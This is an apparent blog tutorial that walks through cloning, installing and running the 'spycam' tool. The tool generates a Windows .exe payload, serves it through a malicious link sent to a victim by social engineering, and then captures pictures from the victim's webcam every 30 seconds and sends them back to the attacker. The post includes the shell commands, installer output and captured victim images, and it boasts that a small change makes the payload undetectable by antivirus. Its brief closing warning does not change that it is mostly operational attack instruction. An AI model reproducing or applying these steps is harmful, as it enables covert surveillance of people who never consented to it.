How to Hack Webcam of Somebody to Take Pictures Every 30 Seconds

Introduction

Many people around the world are always interested to peek into other person computer. Image a hack that will help you to peek into other person webcam. Yes, today we will show you on how easy is for hackers to hack into someone computer and watch the webcam to take pictures every 30 seconds. This all is done using sending malicious URL to victim and impersonating him/her to click on binary. Researcher of International Institute of Cyber Security commented, that small change is attack will be undetectable by Anti-viruses and will be completely FUD. Earlier we demonstrated on how hackers find it easy to hack whatsapp of somebody using single link.

We will walk you through steps on how a hacker can remotely take pictures of the victim using spycam tool. The main aim of the spycam tool is to take the pictures from the victim’s webcam for every 30 seconds and sends picture’s back to hackers.

Environment

  • Os: Kali Linux 2019.3 64 bit
  • Kernel-Version: 5.2.0

Installation Steps

root@kali:/home/iicybersecurity# git clone https://github.com/thelinuxchoice/spycam
Cloning into 'spycam'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Receiving objects: 100% (27/27), 52.83 KiB | 221.00 KiB/s, done.
Resolving deltas: 100% (9/9), done.
  • Use the cd command to enter into spycam directory
root@kali:/home/iicybersecurity# cd spycam/
root@kali:/home/iicybersecurity/spycam#
  • Next, use this command to install the dependencies bash install.sh
root@kali:/home/iicybersecurity/spycam# bash install.sh
[+] Updating and downloading Mingw-w64
Ign:1 https://deb.globaleaks.org buster/ InRelease
Hit:3 https://deb.globaleaks.org buster/ Release
Hit:2 http://ftp.harukasan.org/kali kali-rolling InRelease
Reading package lists... Done
=========================================================================================================SNIP========================================================================================================================
rl-errors.3 curl_easy_strerror.3 curl_multi_strerror.3 curl_share_strerror.3 '/usr/i686-w64-mingw32/share/man/man3'
 /usr/bin/install -c -m 644 curl_global_init_mem.3 libcurl-tutorial.3 curl_easy_reset.3 curl_easy_escape.3 curl_easy_unescape.3 curl_multi_setopt.3 curl_multi_socket.3 curl_multi_timeout.3 curl_formget.3 curl_multi_assign.3 curl_easy_pause.3 curl_easy_recv.3 curl_easy_send.3 curl_multi_socket_action.3 curl_multi_wait.3 libcurl-symbols.3 libcurl-thread.3 curl_multi_socket_all.3 curl_global_sslset.3 curl_mime_init.3 curl_mime_free.3 curl_mime_addpart.3 curl_mime_name.3 curl_mime_data.3 curl_mime_data_cb.3 curl_mime_filedata.3 curl_mime_filename.3 curl_mime_subparts.3 curl_mime_type.3 curl_mime_headers.3 curl_mime_encoder.3 libcurl-env.3 libcurl-security.3 '/usr/i686-w64-mingw32/share/man/man3'
make[6]: Leaving directory '/opt/curl-7.61.1/docs/libcurl'
make[5]: Leaving directory '/opt/curl-7.61.1/docs/libcurl'
make[4]: Leaving directory '/opt/curl-7.61.1/docs/libcurl'
make[3]: Leaving directory '/opt/curl-7.61.1'
make[2]: Leaving directory '/opt/curl-7.61.1'
make[1]: Leaving directory '/opt/curl-7.61.1'
[+] Configuring PHP (php.ini)
  • Next, use this command to give the file permissions chmod +x spycam
root@kali:/home/iicybersecurity/spycam# chmod +x spycam
  • Now, use this command to launch the tool. ./spycam
SpyCam - Tool Launch
SpyCam – Tool Launch
  • We successfully launched the tool
  • Now, we have to set the payload name. Payload name should is something to provoke victim onto clicking it.
  • After that it generates a payload with .exe extension, then it starts PHP servers to provide a malicious link.
  • Next send this malicious link to the victim using social engineering.
  • If victims open the URL in the browser
SpyCam - Malicious Link
SpyCam – Malicious Link
  • It downloads the payload.exe file automatically.
  • If victims run the .exe file in his machine it executes the payload on his machine and webcam starts taking the pictures from the webcam.
SpyCam - WebCam Images
SpyCam – WebCam Images
  •  After taking the pictures, it saves all the pictures in uploadedfile directory.
  • There we can file all the pictures.
root@kali:/home/iicybersecurity/spycam/uploadedfiles# ls
29May2020120754image.bmp  29May2020120857image.bmp  29May2020121007image.bmp 
  • Now, open the Image, and let’s see whether the tool captured the image of the victim. Below you can see the captured image of Victim.
SpyCam - Victims Image
SpyCam – Victims Image
  • Successfully we got the victims Picture.

Conclusion

We saw how easy to take pictures of the victim from his webcam by executing a single malicious file. Most of the people and hackers use these kind of techniques. So it is always recommended to not click on any unknown link and install unknown binary.